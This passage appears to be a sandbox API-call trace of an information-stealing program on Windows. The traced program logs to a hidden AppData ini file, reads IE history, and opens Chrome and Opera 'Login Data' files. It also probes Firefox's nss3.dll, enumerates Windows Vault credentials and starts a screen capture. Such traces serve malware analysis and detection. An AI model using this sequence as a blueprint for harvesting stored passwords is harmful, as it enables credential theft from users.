RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24d440, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24d458*=0xac, IoStatusBlock=0x24d440*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0106.819] NtQueryInformationFile (in: FileHandle=0xac, IoStatusBlock=0x24d440, FileInformation=0x24d398, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x24d440, FileInformation=0x24d398) returned 0x0 [0106.819] NtWriteFile (in: FileHandle=0xac, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x24d440, Buffer=0x106960*, Length=0x12, ByteOffset=0x24d3b0*=820, Key=0x0 | out: IoStatusBlock=0x24d440, Buffer=0x106960*) returned 0x0 [0106.820] NtClose (Handle=0xac) returned 0x0 [0106.820] NtEnumerateValueKey (in: KeyHandle=0xa8, Index=0x8, KeyValueInformationClass=0x1, KeyValueInformation=0x24d530, Length=0x400, ResultLength=0x24e18c | out: KeyValueInformation=0x24d530, ResultLength=0x24e18c) returned 0x0 [0106.820] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtPathName=0x24d438, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0106.820] NtCreateFile (in: FileHandle=0x24d458, DesiredAccess=0x12019f, ObjectAttributes=0x24d420*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24d440, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24d458*=0xac, IoStatusBlock=0x24d440*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0106.820] NtQueryInformationFile (in: FileHandle=0xac, IoStatusBlock=0x24d440, FileInformation=0x24d398, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x24d440, FileInformation=0x24d398) returned 0x0 [0106.820] NtWriteFile (in: FileHandle=0xac, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x24d440, Buffer=0x106960*, Length=0x2e, ByteOffset=0x24d3b0*=838, Key=0x0 | out: IoStatusBlock=0x24d440, Buffer=0x106960*) returned 0x0 [0106.820] NtClose (Handle=0xac) returned 0x0 [0106.827] RtlIntegerToChar (in: Value=0x0, Base=0x0, Length=0x20, String=0x24d498 | out: String="0") returned 0x0 [0106.827] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtPathName=0x24d438, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0106.827] NtCreateFile (in: FileHandle=0x24d458, DesiredAccess=0x12019f, ObjectAttributes=0x24d420*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24d440, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24d458*=0xac, IoStatusBlock=0x24d440*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0106.827] NtQueryInformationFile (in: FileHandle=0xac, IoStatusBlock=0x24d440, FileInformation=0x24d398, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x24d440, FileInformation=0x24d398) returned 0x0 [0106.827] NtWriteFile (in: FileHandle=0xac, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x24d440, Buffer=0x106960*, Length=0x6, ByteOffset=0x24d3b0*=884, Key=0x0 | out: IoStatusBlock=0x24d440, Buffer=0x106960*) returned 0x0 [0106.827] NtClose (Handle=0xac) returned 0x0 [0106.827] NtEnumerateValueKey (in: KeyHandle=0xa8, Index=0x9, KeyValueInformationClass=0x1, KeyValueInformation=0x24d530, Length=0x400, ResultLength=0x24e18c | out: KeyValueInformation=0x24d530, ResultLength=0x24e18c) returned 0x0 [0106.827] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtPathName=0x24d438, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0106.827] NtCreateFile (in: FileHandle=0x24d458, DesiredAccess=0x12019f, ObjectAttributes=0x24d420*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24d440, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24d458*=0xac, IoStatusBlock=0x24d440*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0106.827] NtQueryInformationFile (in: FileHandle=0xac, IoStatusBlock=0x24d440, FileInformation=0x24d398, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x24d440, FileInformation=0x24d398) returned 0x0 [0106.827] NtWriteFile (in: FileHandle=0xac, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x24d440, Buffer=0x106960*, Length=0x20, ByteOffset=0x24d3b0*=890, Key=0x0 | out: IoStatusBlock=0x24d440, Buffer=0x106960*) returned 0x0 [0106.827] NtClose (Handle=0xac) returned 0x0 [0106.834] RtlIntegerToChar (in: Value=0xe0003, Base=0x0, Length=0x20, String=0x24d498 | out: String="917507") returned 0x0 [0106.835] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtPathName=0x24d438, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0106.835] NtCreateFile (in: FileHandle=0x24d458, DesiredAccess=0x12019f, ObjectAttributes=0x24d420*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24d440, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24d458*=0xac, IoStatusBlock=0x24d440*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0106.835] NtQueryInformationFile (in: FileHandle=0xac, IoStatusBlock=0x24d440, FileInformation=0x24d398, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x24d440, FileInformation=0x24d398) returned 0x0 [0106.835] NtWriteFile (in: FileHandle=0xac, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x24d440, Buffer=0x106960*, Length=0x10, ByteOffset=0x24d3b0*=922, Key=0x0 | out: IoStatusBlock=0x24d440, Buffer=0x106960*) returned 0x0 [0106.835] NtClose (Handle=0xac) returned 0x0 [0106.835] NtEnumerateValueKey (in: KeyHandle=0xa8, Index=0xa, KeyValueInformationClass=0x1, KeyValueInformation=0x24d530, Length=0x400, ResultLength=0x24e18c | out: KeyValueInformation=0x24d530, ResultLength=0x24e18c) returned 0x0 [0106.835] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtPathName=0x24d438, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0106.835] NtCreateFile (in: FileHandle=0x24d458, DesiredAccess=0x12019f, ObjectAttributes=0x24d420*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24d440, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24d458*=0xac, IoStatusBlock=0x24d440*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0106.835] NtQueryInformationFile (in: FileHandle=0xac, IoStatusBlock=0x24d440, FileInformation=0x24d398, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x24d440, FileInformation=0x24d398) returned 0x0 [0106.835] NtWriteFile (in: FileHandle=0xac, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x24d440, Buffer=0x106960*, Length=0x2e, ByteOffset=0x24d3b0*=938, Key=0x0 | out: IoStatusBlock=0x24d440, Buffer=0x106960*) returned 0x0 [0106.835] NtClose (Handle=0xac) returned 0x0 [0106.835] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtPathName=0x24d438, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0106.835] NtCreateFile (in: FileHandle=0x24d458, DesiredAccess=0x12019f, ObjectAttributes=0x24d420*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24d440, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24d458*=0xac, IoStatusBlock=0x24d440*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0106.835] NtQueryInformationFile (in: FileHandle=0xac, IoStatusBlock=0x24d440, FileInformation=0x24d398, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x24d440, FileInformation=0x24d398) returned 0x0 [0106.835] NtWriteFile (in: FileHandle=0xac, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x24d440, Buffer=0x106960*, Length=0xc4, ByteOffset=0x24d3b0*=984, Key=0x0 | out: IoStatusBlock=0x24d440, Buffer=0x106960*) returned 0x0 [0106.836] NtClose (Handle=0xac) returned 0x0 [0106.836] NtEnumerateValueKey (in: KeyHandle=0xa8, Index=0xb, KeyValueInformationClass=0x1, KeyValueInformation=0x24d530, Length=0x400, ResultLength=0x24e18c | out: KeyValueInformation=0x24d530, ResultLength=0x24e18c) returned 0x0 [0106.836] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtPathName=0x24d438, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0106.836] NtCreateFile (in: FileHandle=0x24d458, DesiredAccess=0x12019f, ObjectAttributes=0x24d420*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24d440, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24d458*=0xac, IoStatusBlock=0x24d440*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0106.836] NtQueryInformationFile (in: FileHandle=0xac, IoStatusBlock=0x24d440, FileInformation=0x24d398, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x24d440, FileInformation=0x24d398) returned 0x0 [0106.836] NtWriteFile (in: FileHandle=0xac, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x24d440, Buffer=0x106960*, Length=0x30, ByteOffset=0x24d3b0*=1180, Key=0x0 | out: IoStatusBlock=0x24d440, Buffer=0x106960*) returned 0x0 [0106.836] NtClose (Handle=0xac) returned 0x0 [0106.836] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtPathName=0x24d438, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0106.836] NtCreateFile (in: FileHandle=0x24d458, DesiredAccess=0x12019f, ObjectAttributes=0x24d420*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24d440, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24d458*=0xac, IoStatusBlock=0x24d440*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0106.836] NtQueryInformationFile (in: FileHandle=0xac, IoStatusBlock=0x24d440, FileInformation=0x24d398, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x24d440, FileInformation=0x24d398) returned 0x0 [0106.836] NtWriteFile (in: FileHandle=0xac, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x24d440, Buffer=0x106960*, Length=0x1c, ByteOffset=0x24d3b0*=1228, Key=0x0 | out: IoStatusBlock=0x24d440, Buffer=0x106960*) returned 0x0 [0106.836] NtClose (Handle=0xac) returned 0x0 [0106.836] NtEnumerateValueKey (in: KeyHandle=0xa8, Index=0xc, KeyValueInformationClass=0x1, KeyValueInformation=0x24d530, Length=0x400, ResultLength=0x24e18c | out: KeyValueInformation=0x24d530, ResultLength=0x24e18c) returned 0x0 [0106.836] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtPathName=0x24d438, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0106.836] NtCreateFile (in: FileHandle=0x24d458, DesiredAccess=0x12019f, ObjectAttributes=0x24d420*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24d440, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24d458*=0xac, IoStatusBlock=0x24d440*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0106.836] NtQueryInformationFile (FileHandle=0xac, IoStatusBlock=0x24d440, FileInformation=0x24d398, Length=0x18, FileInformationClass=0x5) [0106.852] NtOpenProcessToken (ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x24d8c8) [0106.868] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="ole32.dll", BaseAddress=0x24d7ec | out: BaseAddress=0x24d7ec*=0x766f0000) returned 0x0 [0106.885] CoInitialize (pvReserved=0x0) returned 0x0 [0106.892] CoCreateInstance (in: rclsid=0x24d8d4*(Data1=0x3c374a40, Data2=0xbae4, Data3=0x11cf, Data4=([0]=0xbf, [1]=0x7d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x69, [6]=0x46, [7]=0xee)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x24d8e4*(Data1=0xafa0dc11, Data2=0xc313, Data3=0x11d0, Data4=([0]=0x83, [1]=0x1a, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd5, [6]=0xae, [7]=0x38)), ppv=0x24d8fc | out: ppv=0x24d8fc*=0x11ddc0) returned 0x0 [0106.907] IUrlHistoryStg:EnumUrls (in: This=0x11ddc0, ppenum=0x24d8f8 | out: ppenum=0x24d8f8*=0x11e008) returned 0x0 [0106.947] IUnknown:Release (This=0x11ddc0) returned 0x1 [0106.947] CoUninitialize () [0106.960] NtEnumerateValueKey (in: KeyHandle=0xa4, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x24d920, Length=0x800, ResultLength=0x24e7d8 | out: KeyValueInformation=0x24d920, ResultLength=0x24e7d8) returned 0x8000001a [0106.960] NtClose (Handle=0xa4) returned 0x0 [0106.971] NtCreateKey (in: KeyHandle=0x24e73c, DesiredAccess=0x20219, ObjectAttributes=0x24e5b4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\Machine\\SOFTWARE\\Mozilla\\Mozilla Firefox\\", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x24e73c*=0xa4) returned 0x0 [0106.971] NtQueryValueKey (in: KeyHandle=0xa4, ValueName="CurrentVersion", KeyValueInformationClass=0x1, KeyValueInformation=0x128200, Length=0x100, ResultLength=0x24e724 | out: KeyValueInformation=0x128200*(TitleIndex=0x0, Type=0x1, DataOffset=0x30, DataLength=0x1a, NameLength=0x1c, Name="CurrentVersion", Data="25.0 (en-US)"), ResultLength=0x24e724) returned 0x0 [0106.971] NtClose (Handle=0xa4) returned 0x0 [0106.981] RtlCharToInteger (in: String="25.0 (en-US)", Base=0x0, Value=0x127d9c | out: Value=0x127d9c) returned 0x0 [0106.981] NtCreateKey (in: KeyHandle=0x24e73c, DesiredAccess=0x20219, ObjectAttributes=0x24e5d4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\Machine\\SOFTWARE\\Mozilla\\Mozilla Firefox\\25.0 (en-US)\\Main", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x24e73c*=0xa4) returned 0x0 [0106.981] NtQueryValueKey (in: KeyHandle=0xa4, ValueName="Install Directory", KeyValueInformationClass=0x1, KeyValueInformation=0x127e00, Length=0x200, ResultLength=0x24e724 | out: KeyValueInformation=0x127e00*(TitleIndex=0x0, Type=0x1, DataOffset=0x38, DataLength=0x42, NameLength=0x22, Name="Install Directory", Data="C:\\Program Files\\Mozilla Firefox"), ResultLength=0x24e724) returned 0x0 [0106.981] NtClose (Handle=0xa4) returned 0x0 [0106.981] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="PATH", Value=0x24e380 | out: Value="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x0 [0106.989] RtlSetEnvironmentVariable (in: Environment=0x0, Name="PATH", Value="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\;C:\\Program Files\\Mozilla Firefox" | out: Environment=0x0) returned 0x0 [0106.989] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="C:\\Program Files\\Mozilla Firefox\\nss3.dll", BaseAddress=0x24e378 | out: BaseAddress=0x24e378*=0x0) returned 0xc0000135 [0107.236] RtlSetEnvironmentVariable (in: Environment=0x0, Name="PATH", Value="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\" | out: Environment=0x0) returned 0x0 [0107.236] NtCreateKey (in: KeyHandle=0x24e734, DesiredAccess=0x20219, ObjectAttributes=0x24e5ac*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\Machine\\SOFTWARE\\Mozilla\\Mozilla Thunderbird\\", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x24e734*=0x0) returned 0xc0000022 [0107.237] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="LOCALAPPDATA", Value=0x24e39c | out: Value="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local") returned 0x0 [0107.237] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data", NtPathName=0x24e370, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0107.237] NtCreateFile (in: FileHandle=0x24e390, DesiredAccess=0x120089, ObjectAttributes=0x24e358*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24e378, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24e390*=0xa4, IoStatusBlock=0x24e378*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0107.271] NtQueryInformationFile (in: FileHandle=0xa4, IoStatusBlock=0x24e378, FileInformation=0x24e2d0, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x24e378, FileInformation=0x24e2d0) returned 0x0 [0107.271] NtClose (Handle=0xa4) returned 0x0 [0107.271] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="winsqlite3.dll", BaseAddress=0x24e32c | out: BaseAddress=0x24e32c*=0x0) returned 0xc0000135 [0107.272] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="APPDATA", Value=0x24e2ec | out: Value="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming") returned 0x0 [0107.272] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Opera Software\\Opera Stable\\Login Data", NtPathName=0x24e2d0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Opera Software\\Opera Stable\\Login Data", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0107.272] NtCreateFile (in: FileHandle=0x24e2f0, DesiredAccess=0x120089, ObjectAttributes=0x24e2b8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Opera Software\\Opera Stable\\Login Data", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24e2d8, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24e2f0*=0xffffffff, IoStatusBlock=0x24e2d8*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0107.272] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="vaultcli.dll", BaseAddress=0x24e514 | out: BaseAddress=0x24e514*=0x722a0000) returned 0x0 [0107.314] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrv.ini", NtPathName=0x24e3e4, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrv.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0107.314] NtCreateFile (in: FileHandle=0x24e404, DesiredAccess=0x120089, ObjectAttributes=0x24e3cc*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrv.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24e3ec, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24e404*=0xffffffff, IoStatusBlock=0x24e3ec*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000034 [0107.314] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrv.ini", NtPathName=0x24e3fc, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrv.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0107.314] NtCreateFile (in: FileHandle=0x24e41c, DesiredAccess=0x12019f, ObjectAttributes=0x24e3e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrv.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24e404, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24e41c*=0xf4, IoStatusBlock=0x24e404*(Status=0x0, Pointer=0x0, Information=0x2)) returned 0x0 [0107.315] NtQueryInformationFile (in: FileHandle=0xf4, IoStatusBlock=0x24e404, FileInformation=0x24e35c, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x24e404, FileInformation=0x24e35c) returned 0x0 [0107.315] NtWriteFile (in: FileHandle=0xf4, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x24e404, Buffer=0x106960*, Length=0x28, ByteOffset=0x24e374*=0, Key=0x0 | out: IoStatusBlock=0x24e404, Buffer=0x106960*) returned 0x0 [0107.315] NtClose (Handle=0xf4) returned 0x0 [0107.315] VaultEnumerateVaults () returned 0x0 [0107.846] VaultOpenVault () returned 0x0 [0107.846] VaultEnumerateItems () returned 0x0 [0107.846] VaultFree () returned 0x0 [0107.846] VaultCloseVault () returned 0x0 [0107.847] VaultOpenVault () returned 0x0 [0107.847] VaultEnumerateItems () returned 0x0 [0107.847] VaultFree () returned 0x0 [0107.847] VaultCloseVault () returned 0x0 [0107.847] VaultFree () returned 0x1 [0107.847] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="gdiplus.dll", BaseAddress=0x24e3d0 | out: BaseAddress=0x24e3d0*=0x73d70000) returned 0x0 [0107.887] GetDC (hWnd=0x0) returned 0x2401080f [0107.888] CreateCompatibleDC (hdc=0x2401080f) returned 0x2901071a [0107.888] GetSystemMetrics (nIndex=0) returned 1440 [0107.888] GetSystemMetrics (nIndex=1) returned 900 [0107.888] CreateCompatibleBitmap (hdc=0x2401080f, cx=1440, cy=900) returned 0x24050907 [0107.889] SelectObject 